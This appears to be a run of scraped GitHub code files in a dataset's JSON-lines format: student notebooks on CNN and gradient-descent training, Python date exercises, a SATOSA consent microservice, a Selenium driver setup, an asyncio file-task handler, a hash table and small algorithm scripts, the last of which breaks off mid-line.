[markdown] id=\"rMnb9gSGaIjP\" colab_type=\"text\"\n# # Training with a GPU \n# You are requested to change your code to use the GPU instead of the CPU.\n# This can be easily done bu converting every torch.tensor to torch.cuda.tensor. \n#\n# Specific instructions:\n# * Change the hardware equipent of your colab notebook. To do that, go to the \"Runtime\" menu, and then to \"Change runtime type\". In the dialog box, change \"Hardware accelerator\" to GPU.\n# * Please follow the lines that were commented out with the comment # -- For GPU (in notebook 11)\n# * Also, remove the lines that have the comment # -- For CPU\n#\n# Train your network again and compare training time.\n\n# + id=\"77G7gfj6Ok5B\" colab_type=\"code\" colab={}\nmodel_GPU = SVHNCnn().cuda()\n\n# + id=\"EnAE7izERyhD\" colab_type=\"code\" colab={}\n# Define loss function\ncriterion = nn.CrossEntropyLoss()\n\n# Define the learning rate\nlr=0.004\n\n# Define the optimizer\noptimizer = torch.optim.SGD(model_GPU.parameters(), lr=lr,momentum=0.9)\n\n# + id=\"IGwB7SRtH52g\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} outputId=\"bcc49ddb-4c88-40a5-f17a-f543b51bea0e\"\n# Training with GPU\ngpu_train_loss, gpu_test_loss= train(model_GPU, trainloader, testloader,criterion, optimizer,lr)\n\n# + id=\"4oEGQ34PGKYZ\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 607} outputId=\"a21ac527-a0a9-48e5-cfaa-4df7bfbc6855\"\n# Plot the loss graphs\nplot(\"GPU\",gpu_train_loss, gpu_test_loss)\n\n# + id=\"2-sy7xDRI0Ap\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 51} outputId=\"6b1a2459-6dcb-4324-ac83-be8eadd2b6ef\"\n# Calculate the accuracies\nprint('Accuracy on the training set: %d%%\\nAccuracy on the test set: %d%%' \n % (calculate_accuracy(model_GPU,trainloader),calculate_accuracy(model_GPU,testloader)))\n\n# + [markdown] id=\"Vm5DnMate6s0\" colab_type=\"text\"\n# # Submission instructions\n#\n# You should submit a pdf file with the following items:\n#\n# CPU Experiment:\n# * Plot of loss curves (train in blue, test in red)\n# * Training time\n#\n# GPU Experiment:\n# * Plot of loss curves (train in blue, test in red)\n# * Training time\n#\n# Link for your collab notebook.\n# ID and names of submitters.\n#\n#\n# Good luck!\n","repo_name":"DorinK/Assignment-2-CNN-over-SVHN","sub_path":"Assignment_2_CNN_for_house_numbers.ipynb","file_name":"Assignment_2_CNN_for_house_numbers.ipynb","file_ext":"py","file_size_in_byte":13426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"74419732244","text":"# Задание № 1\n# Напишите функцию date_range, которая возвращает список дней между датами start_date и end_date. Даты должны вводиться в формате YYYY-MM-DD.\n#\n\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\ndef date_range(start_date, end_date):\n start_date = datetime.strptime(start_date, '%Y-%m-%d')\n end_date = datetime.strptime(end_date, '%Y-%m-%d')\n current_date = start_date\n while current_date <= end_date:\n print(current_date.strftime('%Y-%m-%d'))\n current_date += timedelta(days=1)\n\n\ndate_range('2018-05-01', '2018-06-01')\n\n\n# Задание № 2\n# Дополните функцию из первого задания проверкой на корректность дат. В случае неверного формата или если start_date > end_date должен возвращаться пустой список.\n#\n\ndef date_range_new(start_date, end_date):\n try:\n datetime.strptime(start_date, '%Y-%m-%d')\n datetime.strptime(end_date, '%Y-%m-%d')\n datetime.strptime(start_date, '%Y-%m-%d') < datetime.strptime(end_date, '%Y-%m-%d')\n start_date = datetime.strptime(start_date, '%Y-%m-%d')\n end_date = datetime.strptime(end_date, '%Y-%m-%d')\n current_date = start_date\n while current_date <= end_date:\n print(current_date.strftime('%Y-%m-%d'))\n current_date += timedelta(days=1)\n except:\n print([])\n\n\ndate_range_new('01-02-2018', '2018-07-01')\n\n# Задание № 3\n# Дан поток дат в формате YYYY-MM-DD, в которых встречаются некорректные значения:\n# stream = ['2018-04-02', '2018-02-29', '2018-19-02']\n# Напишите функцию, которая проверяет эти даты на корректность. Т. е. для каждой даты возвращает True (дата корректна) или False (некорректная дата). \n#\n\nstream = ['2018-04-02', '2018-02-29', '2018-19-02']\ndef date_chek(line):\n for date in line:\n try:\n datetime.strptime(date, '%Y-%m-%d')\n print(date, 'Дата корректна')\n except:\n print(date, 'Некорректная дата')\n\n\ndate_chek(stream)\n\n# Задание № 5\n# В последнем примере поиска по словарю мы использовали 3 столбца. Напишите функцию, которая формирует словарь для поиска по n столбцам.\n\nline_to_find = ('20', '20552')\ndef finder(file, n):\n stats_dict = {}\n with open(file) as f:\n for line in f:\n line = line.strip().split(',')\n stats_dict[tuple(line[:n])] = line[n]\n cost = stats_dict[line_to_find]\n print(cost)\n\n\nfinder('stats.csv', 2)\n","repo_name":"Vanek89/netology_pyda","sub_path":"Homework_9_Bogomolov.ipynb","file_name":"Homework_9_Bogomolov.ipynb","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"70772325845","text":"# ## Loss function\n# The loss is the error in our predicted of m and c. Our goal is to minimize this error to obtain the most accurance value of m and c.\n# We will use the Mean Squared Error function to calculate the loss. There are three steps in this function:\n#\n# Find the difference between the actual y and predicted y value(y = mx + c), for a given x.\n# Square this difference.\n# Find the mean of the squares for every value in X.\n# $$ E = \\frac{1}{n} \\sum_{i=0}^n (y_i - \\bar y_i)^2$$\n# Here $y_i$ is the actual value and $\\bar y_i$ is the predicted value. Lets substitue the value of $\\bar y_i$$$ E = \\frac{1}{n} \\sum_{i=0}^n (y_i - (mx_i + c))^2$$So we square the error and find the mean. hence the name Mean Squared Error.\n# Now that we have defined the loss function, lets get into the interesting part - minimizing it and finding m and c\n\n# # Gradient Descent\n# Gradient descent is an optimization algorithm used to find the values of parameters (coefficients) of a function (f) that minimizes a cost function (cost).\n# applying gradient descent Logic to m and c and approach it step by step:\n#\n# Initially let m = 0 and c = 0. Let L be our learning rate. This controls how much the value of m changes with each step. L could be a small value like 0.0001 for good accuracy.\n# Calculate the partial derivative of the loss function with respect to m, and plug in the current values of x, y, m and c in it to obtain the derivative value D.\n# $$ D_m = \\frac{1}{n} \\sum_{i=0}^n 2(y_i - (mx_i + c))(-x_i) $$$$ D_m = \\frac{-2}{n} \\sum_{i=0}^n x_i(y_i - \\bar y_i) $$\n# $D_m$ is the value of the partial derivative with respect to m. Similarly lets find the partial derivative with respect to c, $D_c$ :\n# $$ D_c = \\frac{-2}{n} \\sum_{i=0}^n (y_i - \\bar y_i) $$\n# Now we update the current value of m and c using the following equation:$$ m = m - L \\times D_m$$\n# $$ c = c - L \\times D_c$$\n# We repeat this process untill our loss function is a very small value or ideally 0 (which means 0 error or 100% accuracy). The value of m and c that we are left with now will be the optimum values.\n\n# +\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (12.0, 9.0)\n\n# Preprocessing Input data\ndata = pd.read_csv('dataGD.csv')\nX = data.iloc[:, 0]\nY = data.iloc[:, 1]\nplt.scatter(X, Y)\nplt.show()\n\n# +\n# Building the model\nm = 0\nc = 0\n\nL = 0.0001 # The learning Rate\nepochs = 1000 # The number of iterations to perform gradient descent\n\nn = float(len(X)) # Number of elements in X\n\n# Performing Gradient Descent \nfor i in range(epochs): \n Y_pred = m*X + c # The current predicted value of Y\n D_m = (-2/n) * sum(X * (Y - Y_pred)) # Derivative wrt m\n D_c = (-2/n) * sum(Y - Y_pred) # Derivative wrt c\n m = m - L * D_m # Update m\n c = c - L * D_c # Update c\n \nprint (m, c)\n\n# +\n# Making predictions\nY_pred = m*X + c\n\nplt.scatter(X,Y)\nplt.scatter(X,Y_pred)\nplt.show()\n# -\n\nplt.scatter(X, Y)\nplt.plot([min(X), max(X)], [min(Y_pred), max(Y_pred)], color='red') # predicted\nplt.show()\n\n\n","repo_name":"Laukit13/Machine-Learning-Projects","sub_path":"Linear Regg with Gradient Descent.ipynb","file_name":"Linear Regg with Gradient Descent.ipynb","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"30024039495","text":"import gettext\n\nimport pkg_resources\nfrom mako.lookup import TemplateLookup\nfrom satosa.exception import SATOSAAuthenticationError\nfrom satosa.internal_data import InternalResponse\nfrom satosa.micro_services import consent\nfrom satosa.micro_services.base import ResponseMicroService\nfrom satosa.response import Response\n\n\ndef N_(s):\n \"\"\"\n Dummy function to mark strings for translation, but defer the actual translation for later (using the real \"_()\").\n :param s:\n :return:\n \"\"\"\n return s\n\n\nclass UserConsent(ResponseMicroService):\n \"\"\"\n Select which backend should be used based on what the OIDC scope is.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Constructor.\n \"\"\"\n super().__init__(*args, **kwargs)\n\n self.endpoint = '/handle_consent'\n self.template_lookup = TemplateLookup(directories=[pkg_resources.resource_filename('svs', 'templates/')])\n\n def _find_requester_name(self, requester_name, language):\n return requester_name\n # requester_names = {entry['lang']: entry['text'] for entry in requester_name}\n # # fallback to english, or if all else fails, use the first entry in the list of names\n # fallback = requester_names.get('en', requester_name[0]['text'])\n # return requester_names.get(language, fallback)\n\n def _attributes_to_release(self, internal_response):\n attributes = {\n N_('Affiliation'): internal_response.attributes['affiliation'],\n N_('Identifier'): internal_response.user_id,\n N_('Authentication time'): internal_response.auth_info.timestamp\n }\n if 'domain' in internal_response.attributes:\n attributes[N_('Domain')] = internal_response.attributes['domain']\n\n return attributes\n\n def render_consent(self, internal_response, language='en'):\n requester_name = self._find_requester_name(internal_response.requester, language)\n gettext.translation('messages', localedir=pkg_resources.resource_filename('svs', 'data/i18n/locale'),\n languages=[language]).install()\n\n released_attributes = self._attributes_to_release(internal_response)\n template = self.template_lookup.get_template('consent.mako')\n page = template.render(client_name=requester_name,\n released_attributes=released_attributes,\n form_action='/consent{}'.format(self.endpoint),\n language=language)\n\n return Response(page, content='text/html')\n\n def process(self, context, internal_response):\n \"\"\"\n Ask the user for consent of data to be released.\n :param context: request context\n :param internal_response: the internal response\n \"\"\"\n consent_state = context.state[consent.STATE_KEY]\n internal_response.attributes = {k: v for k, v in internal_response.attributes.items() if\n k in consent_state['filter']}\n\n context.state[self.name] = {'internal_response': internal_response.to_dict()}\n return self.render_consent(internal_response)\n\n def accept_consent(self, context):\n \"\"\"\n Endpoint for handling accepted consent.\n :type context: satosa.context.Context\n :rtype: satosa.response.Response\n\n :param context: response context\n :return: response\n \"\"\"\n consent_state = context.state[self.name]\n saved_resp = consent_state['internal_response']\n internal_response = InternalResponse.from_dict(saved_resp)\n del context.state[self.name]\n return super().process(context, internal_response)\n\n def deny_consent(self, context):\n \"\"\"\n Endpoint for handling denied consent.\n :type context: satosa.context.Context\n :rtype: satosa.response.Response\n\n :param context: response context\n :return: response\n \"\"\"\n del context.state[self.name]\n raise SATOSAAuthenticationError(context.state, 'Consent was denied by the user.')\n\n def change_language(self, context):\n consent_state = context.state[self.name]\n saved_resp = consent_state['internal_response']\n internal_response = InternalResponse.from_dict(saved_resp)\n\n lang = context.request.get('lang', 'en')\n return self.render_consent(internal_response, lang)\n\n def register_endpoints(self):\n base = '^consent{}'.format(self.endpoint)\n url_map = []\n url_map.append(('{}$'.format(base), self.change_language))\n url_map.append(('{}/allow'.format(base), self.accept_consent))\n url_map.append(('{}/deny'.format(base), self.deny_consent))\n return url_map\n","repo_name":"SUNET/svs","sub_path":"src/svs/user_consent.py","file_name":"user_consent.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33623810994","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom .driver_config import BROWSER, REMOTE_IP, REMOTE_PORT\n\nBROWSERS = {\n 'chrome': webdriver.Chrome,\n 'remote': webdriver.Remote\n}\n\n\nclass Driver:\n def __init__(self, **kwgs):\n self.kwgs = kwgs\n if BROWSER == 'chrome':\n self.kwgs['executable_path'] = ChromeDriverManager().install()\n options = webdriver.ChromeOptions()\n options.add_argument(\"--start-maximized\")\n self.kwgs['options'] = options\n\n if BROWSER == 'remote':\n self.kwgs['command_executor'] = f'http://{REMOTE_IP}:{REMOTE_PORT}/wd/hub'\n options = webdriver.ChromeOptions()\n options.add_argument(\"--start-maximized\")\n self.kwgs['desired_capabilities'] = options.to_capabilities()\n\n def start(self):\n driver = BROWSERS[BROWSER](**self.kwgs)\n return driver\n","repo_name":"IlyaKnysh/pytest-bdd-demo","sub_path":"core/config/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18885690997","text":"from .nodo import Nodo\n\n\nclass Lista:\n\n\tdef __init__(self):\n\t\tself.__primero = None\n\t\tself.__ultimo = None\n\n############################################### vacio #############################################\n\n\tdef vacio(self):\n\t\tif self.__primero == None:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n######################################### agregar ##############################################\n\n\tdef agregar(self,id,nombreOponente,tirosRealizados,tirosAcertados,tirosFallados,ganoPerdido,daño):\n\t\tif self.vacio(): # verificar si esta vacia \n\t\t\tself.__primero = self.__ultimo = Nodo(id,nombreOponente,tirosRealizados,tirosAcertados,tirosFallados,ganoPerdido,daño)\n\t\telse:# no esta vacio \n\t\t\tnuevo = Nodo(id,nombreOponente,tirosRealizados,tirosAcertados,tirosFallados,ganoPerdido,daño)\n\t\t\tself.__ultimo.siguiente = nuevo\n\t\t\tnuevo.anterior = self.__ultimo\n\t\t\tself.__ultimo = nuevo\n\n########################################### eliminar #######################################\n\n\tdef eliminar(self,id):\n\t\taux = self.__primero\n\t\tif ~self.vacio():\n\t\t\twhile aux:\n\t\t\t\tif aux.id ==id:\n\t\t\t\t\tif self.__primero == self.__ultimo:\n\t\t\t\t\t\tself.__primero = self.__ultimo = None\n\t\t\t\t\telif aux == self.__primero:\n\t\t\t\t\t\tself.__primero = aux.siguiente\n\t\t\t\t\t\tself.__primero.anterior = None\n\t\t\t\t\t\taux.siguiente = None\n\t\t\t\t\telif aux == self.__ultimo:\n\t\t\t\t\t\tself.__ultimo = aux.anterior\n\t\t\t\t\t\tself.__ultimo.siguiente = None\n\t\t\t\t\t\taux.anterior = None\n\t\t\t\t\telse:\n\t\t\t\t\t\taux.anterior.siguiente = aux.siguiente\n\t\t\t\t\t\taux.siguiente.anterior = aux.anterior\n\t\t\t\t\t\taux.siguiente = None\n\t\t\t\t\t\taux.anterior = None\n\t\t\t\t\treturn aux\n\t\t\t\taux = aux.siguiente\n\t\treturn None\n\n\t\t\t\t\t\n\n############################################### buscar ##############################################\n\n\tdef buscar(self, id):\n\t\taux = self.__primero\n\t\tif ~self.vacio():\n\t\t\twhile aux:\n\t\t\t\tif aux.id == id:\n\t\t\t\t\treturn aux\n\t\t\t\t\tbreak\n\t\t\t\taux = aux.siguiente\n\n\tdef registros(self):\n\t\taux = self.__primero\n\t\tif ~self.vacio():\n\t\t\twhile aux:\n\t\t\t\tyield aux\n\t\t\t\taux = aux.siguiente\n\n######################################## imprimir ############################################\n\n\tdef imprimir(self): \n\t\taux = self.__primero\n\t\twhile aux:\n\t\t\tprint(aux.id,aux.nombreOponente,aux.tirosRealizados,aux.tirosAcertados,aux.tirosFallados,aux.ganoPerdido,aux.daño)\n\t\t\taux = aux.siguiente\n","repo_name":"AlejandroMolinaReyes/ProyectoJunio2017_201020787","sub_path":"ProyectoEDD/estructuras/lista/lista.py","file_name":"lista.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27597670326","text":" #!/usr/bin/env python\n\nimport rospy\n\nimport tf2_ros\n\nfrom line_detector.srv import NextPositionInLineService\nfrom gazebo_msgs.msg import ModelState\nfrom gazebo_msgs.srv import SetModelState\nfrom geometry_msgs.msg import Pose, Twist\nfrom tf2_geometry_msgs import PoseStamped\n\n\nrospy.init_node('DEMO_NODE')\n\nprint(\"waiting for services\")\nrospy.wait_for_service('line_detection_service')\nprint(\"got line service\")\nrospy.wait_for_service('gazebo/set_model_state')\nprint(\"got gazebo service\")\n\nline_srv = rospy.ServiceProxy('line_detection_service', NextPositionInLineService)\nteleport_srv = rospy.ServiceProxy('gazebo/set_model_state', SetModelState)\n\nprint(\"setting tf buffer\")\ntfBuffer = tf2_ros.Buffer()\nlistener = tf2_ros.TransformListener(tfBuffer)\n\nprint(\"submitting request\")\nresult = line_srv(1.0, \"ltr\")\nprint(\"got it!\")\nprint(result.next_position)\n\nprint(\"converting to map frame\")\n\n# Assuming the world is static, you could use this fix. Which will force the coordinates transformation to use the last data which there is on the frame, without respect to the time period.\nresult.next_position.header.stamp = rospy.Time(0)\n\ninput_pose = PoseStamped(result.next_position.header, result.next_position.pose)\nconverted_pose = tfBuffer.transform(input_pose, 'map').pose\nconverted_pose.position.z = 0 # ground the position\n\n# A fix for the angle transformation, for the case which the \"/kinect2/qhd/points\" frame is not parallel to the \"map\" frame Z axis\nangle_temp = tf.transformations.euler_from_quaternion((converted_pose.orientation.x,converted_pose.orientation.y,converted_pose.orientation.z,converted_pose.orientation.w))\nconverted_pose.orientation = Quaternion(*tf.transformations.quaternion_from_euler(0,0,angle_temp[2]))\n\nprint(converted_pose)\n\ntwist = Twist()\nmodel_name = \"armadillo2\"\n\ndesired_state = ModelState(model_name, converted_pose, twist, 'map')\nprint(\"teleporting! That probably messes with the transform tree...\")\nteleport_srv(desired_state)\n\npass\n\n\n","repo_name":"EyalSeg/line_detector","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"71923262404","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path(\"\", views.questions_list, name=\"questions_list\"),\n path(\"add/\", views.add_question, name=\"add_question\"),\n path(\"/delete/\", views.delete_question, name=\"delete_question\"),\n path(\"/question_detail/\", views.question_detail, name=\"question_detail\"),\n path(\"/add_answer/\", views.add_answer, name=\"add_answer\"),\n # path('search/', views., name='')\n]\n","repo_name":"momentum-team-3/questionbox-kldavis52","sub_path":"qanda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4313030298","text":"import asyncio\nimport concurrent.futures\nimport enum\nimport multiprocessing\nfrom asyncio import Queue\n\nfrom aiomultiprocess import Pool\n\nfrom file_handler import handle_file\n\n\nclass TaskHandleType(enum.Enum):\n asyncio = 'asyncio'\n bounded_semaphore = 'bounded_semaphore'\n multi_process = 'multi_process'\n aiomultiprocess = 'aiomultiprocess'\n process_pool_executor = 'process_pool_executor'\n\n\nmode = TaskHandleType.asyncio\n\n\nasync def __handle_file_with_semaphore__(file_path: str, new_file_path: str, semaphore):\n async with semaphore:\n await handle_file(file_path, new_file_path)\n\n\nasync def __handle_tasks_semaphore__(queue: Queue):\n semaphore = asyncio.BoundedSemaphore(50)\n tasks = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n tasks.append(__handle_file_with_semaphore__(file_path, new_file_path, semaphore))\n\n await asyncio.gather(*tasks)\n\n\ndef __process_task__(file_path, new_file_path):\n asyncio.run(handle_file(file_path, new_file_path))\n\n\ndef __process_task__arg(args):\n file_path, new_file_path = args\n asyncio.run(handle_file(file_path, new_file_path))\n\n\ndef __handle_tasks_multi_process__(queue):\n tasks = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n tasks.append((file_path, new_file_path))\n\n with multiprocessing.Pool() as pool:\n pool.map(__process_task__, tasks)\n\n\nasync def __handle_task__(args):\n file_path, new_file_path = args\n await handle_file(file_path, new_file_path)\n\n\nasync def __handle_tasks_aiomultiprocess__(queue):\n tasks = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n tasks.append((file_path, new_file_path))\n\n async with Pool() as pool:\n await pool.map(__handle_task__, tasks)\n\n\nasync def __handle_tasks_process_pool_executor__(queue):\n file_paths = []\n new_file_paths = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n file_paths.append(file_path)\n new_file_paths.append(new_file_path)\n\n with concurrent.futures.ProcessPoolExecutor() as executor:\n results = executor.map(__process_task__, file_paths, new_file_paths)\n\n\nasync def __handle_tasks_asyncio__(queue):\n tasks = []\n while not queue.empty():\n file_path, new_file_path = queue.get_nowait()\n tasks.append(asyncio.create_task(handle_file(file_path, new_file_path)))\n\n await asyncio.gather(*tasks)\n\n\nasync def handle_tasks(queue: Queue):\n if mode == TaskHandleType.asyncio:\n await __handle_tasks_asyncio__(queue)\n return\n\n if mode == TaskHandleType.bounded_semaphore:\n await __handle_tasks_semaphore__(queue)\n return\n\n if mode == TaskHandleType.multi_process:\n __handle_tasks_multi_process__(queue)\n return\n\n if mode == TaskHandleType.aiomultiprocess:\n await __handle_tasks_aiomultiprocess__(queue)\n return\n\n if mode == TaskHandleType.process_pool_executor:\n await __handle_tasks_process_pool_executor__(queue)\n return\n\n raise Exception('Invalid mode')\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"pjc1991/py-image-storage","sub_path":"task_handler.py","file_name":"task_handler.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"7619400789","text":"import argparse\n\nimport numpy as np\nimport urllib\nimport cv2\nfrom opendr.perception.object_detection_2d import DetrLearner\nfrom opendr.perception.object_detection_2d.detr.algorithm.util.draw import draw\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--device\", help=\"Device to use (cpu, cuda)\", type=str, default=\"cuda\", choices=[\"cuda\", \"cpu\"])\n parser.add_argument(\"--backbone\", help=\"Backbone to use (resnet50, resnet101)\", type=str, default=\"resnet101\",\n choices=[\"resnet50\", \"resnet101\"])\n parser.add_argument(\"--panoptic-segmentation\", dest='panoptic_segmentation', help=\"Perform panoptic segmentation\",\n default=False, action='store_true')\n\n args = parser.parse_args()\n\n # Download an image\n url = 'http://images.cocodataset.org/val2017/000000039769.jpg'\n req = urllib.request.urlopen(url)\n arr = np.asarray(bytearray(req.read()), dtype=np.uint8)\n img = cv2.imdecode(arr, -1)\n\n # For panoptic segmentation, the number of classes is different\n if args.panoptic_segmentation:\n num_classes = 250\n else:\n num_classes = 91\n\n learner = DetrLearner(\n backbone=args.backbone,\n device=args.device,\n panoptic_segmentation=args.panoptic_segmentation,\n num_classes=num_classes,\n )\n learner.download()\n bounding_box_list = learner.infer(img)\n cv2.imshow('Detections', draw(img, bounding_box_list))\n cv2.waitKey(0)\n","repo_name":"opendr-eu/opendr","sub_path":"projects/python/perception/object_detection_2d/detr/inference_demo.py","file_name":"inference_demo.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":556,"dataset":"github-code","pt":"99"} +{"seq_id":"10586548769","text":"#Find the repeating and the missing\r\nimport math\r\ndef findNumbers(arr, n):\r\n\t\tsumN = (n * (n + 1)) / 2;\r\n\t\tsumSqN = (n * (n + 1) * (2 * n + 1)) / 6;\r\n\t\tsum = 0;\r\n\t\tsumSq = 0;\r\n\t\tfor i in range(0,n):\r\n\t\t\tsum = sum + arr[i];\r\n\t\t\tsumSq = sumSq + (math.pow(arr[i], 2));\r\n\t\tB = (((sumSq - sumSqN) / (sum - sumN)) + sumN - sum) / 2;\r\n\t\tA = sum - sumN + B\r\n\t\tprint(\"A = \",int(A))\r\n\t\tprint(\"B = \",int(B))\r\narr = [ 1, 2, 2, 3, 4, 5, 6 ]\r\nn = len(arr)\r\nfindNumbers(arr, n)","repo_name":"RishavMishraRM/DSA_Problems","sub_path":"Day_9/Find the repeating and the missing.py","file_name":"Find the repeating and the missing.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73030143684","text":"#написать генератор фейковых личностей\n\n#Ввести из командной строки натуральное число и сгенерировать в файл 'people.xlsx' #таблицу с колонками:\n#Номер|Фамилия|Имя|Отчество\n\nfrom russian_names import RussianNames\nimport openpyxl\nnumber= input('Введите целое число: ')\n\ndef create_person(number):\n if number.isnumeric() and int(number) !=0:\n number_int=int(number)\n person=RussianNames(count=number_int,output_type='list').get_batch()\n # print(person) это добавляла для себя для наглядности\n person_list=list(person)\n # print(person_list) это добавляла для себя для наглядности\n wb = openpyxl.Workbook()\n ws = wb.active\n for i in person_list:\n ws.append(i)\n wb.save('vch.xlsx')\n print('Вы создали .xlsx таблицу')\n else:\n print('Вы ввели некорректное число')\n\n\ncreate_person(number)\n\n \n\n \n\n \n \n\n","repo_name":"hanenkotanya/Diplom","sub_path":"russian_names.py","file_name":"russian_names.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26772795278","text":"# '''\n# Linked List hash table key/value pair\n# '''\nclass LinkedPair:\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.next = None\n\nclass HashTable:\n '''\n A hash table that with `capacity` buckets\n that accepts string keys\n '''\n def __init__(self, capacity):\n self.capacity = capacity # Number of buckets in the hash table\n self.storage = [None] * capacity\n\n\n def _hash(self, key):\n '''\n Hash an arbitrary key and return an integer.\n\n You may replace the Python hash with DJB2 as a stretch goal.\n '''\n return hash(key)\n\n\n def _hash_djb2(self, key):\n '''\n Hash an arbitrary key using DJB2 hash\n\n OPTIONAL STRETCH: Research and implement DJB2\n '''\n pass\n\n\n def _hash_mod(self, key):\n '''\n Take an arbitrary key and return a valid integer index\n within the storage capacity of the hash table.\n '''\n return self._hash(key) % self.capacity\n\n\n def insert(self, key, value):\n '''\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Fill this in.\n ''' \n if self.storage[self._hash_mod(key)] is None:\n self.storage[self._hash_mod(key)] = LinkedPair(key, value)\n else:\n node = self.storage[self._hash_mod(key)]\n while node:\n if node.key is key:\n node.value = value\n break\n elif node.next is None:\n node.next = LinkedPair(key, value)\n break\n else:\n node = node.next\n\n def remove(self, key):\n '''\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Fill this in.\n '''\n\n ind = self._hash_mod(key)\n if not self.storage[ind]:\n print(\"Warning: the key is not found\")\n return\n \n node = self.storage[ind]\n previous_node = None\n while node:\n if node.key == key:\n if previous_node:\n previous_node.next = node.next\n break\n else:\n self.storage[ind] = node.next\n break\n elif node.next:\n previous_node = node\n node = node.next\n else:\n print(\"Warning: the key is not found\")\n return\n\n\n def retrieve(self, key):\n '''\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Fill this in.\n '''\n \n if self.storage[self._hash_mod(key)] is None:\n return None\n else:\n node = self.storage[self._hash_mod(key)]\n while node:\n if node.key == key:\n return node.value\n elif node.next is None:\n return None\n else:\n node = node.next \n\n\n def resize(self):\n '''\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Fill this in.\n '''\n temp_list = []\n for i in self.storage:\n node = i\n while node:\n temp_list.append([node.key, node.value])\n node = node.next\n self.capacity = 2*self.capacity\n self.storage = [None]*self.capacity\n for i in temp_list:\n self.insert(i[0], i[1])\n\n\n\nif __name__ == \"__main__\":\n ht = HashTable(2)\n\n ht.insert(\"line_1\", \"Tiny hash table\")\n ht.insert(\"line_2\", \"Filled beyond capacity\")\n ht.insert(\"line_3\", \"Linked list saves the day!\")\n\n print(\"\")\n\n # Test storing beyond capacity\n print(ht.retrieve(\"line_1\"))\n print(ht.retrieve(\"line_2\"))\n print(ht.retrieve(\"line_3\"))\n\n # Test resizing\n old_capacity = len(ht.storage)\n ht.resize()\n new_capacity = len(ht.storage)\n\n print(f\"\\nResized from {old_capacity} to {new_capacity}.\\n\")\n\n # Test if data intact after resizing \n print(ht.retrieve(\"line_1\"))\n print(ht.retrieve(\"line_2\"))\n print(ht.retrieve(\"line_3\"))\n\n print(\"\")\n","repo_name":"mmthatch12/Hash-Tables","sub_path":"src/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11823787396","text":"# coding: utf8\n\"\"\"\nMerge Two Sorted Arrays\n\nAn array A[1..n] is said to have a majority element if more than half of its entries are the same.\n\nGiven: A positive integer n≤10^5 and a sorted array A[1..n] of integers from −10^5 to 10^5, a positive integer m≤10^5 and a sorted array B[1..m] of integers from −10^5 to 10^5.\n\nReturn: A sorted array C[1..n+m] containing all the elements of A and B.\n\nSample Dataset\n 4\n 2 4 10 18\n 3\n -5 11 12\n\nSample Output\n -5 2 4 10 11 12 18\n \n Brute force sort - no merge!\n\"\"\"\n\ndef processData(inFileName):\n with open(inFileName) as datafile:\n datafile.readline()\n A = [int(x) for x in datafile.readline().strip().split(\" \")]\n datafile.readline()\n B = [int(x) for x in datafile.readline().strip().split(\" \")]\n return \" \".join(str(x) for x in sorted(A + B))\n\n\"\"\"\nPersonal observations : \n- Ewww! Simple, but yuck!\n\"\"\"\n \nassert processData('sample.txt') == '-5 2 4 10 11 12 18'\n\nwith open('results.txt', 'w') as resultsfile:\n result = processData('rosalind_mer.txt')\n resultsfile.write(str(result))\n\nwith open('results.txt', 'w') as resultsfile:\n result = processData('rosalind_mer_1_dataset.txt')\n 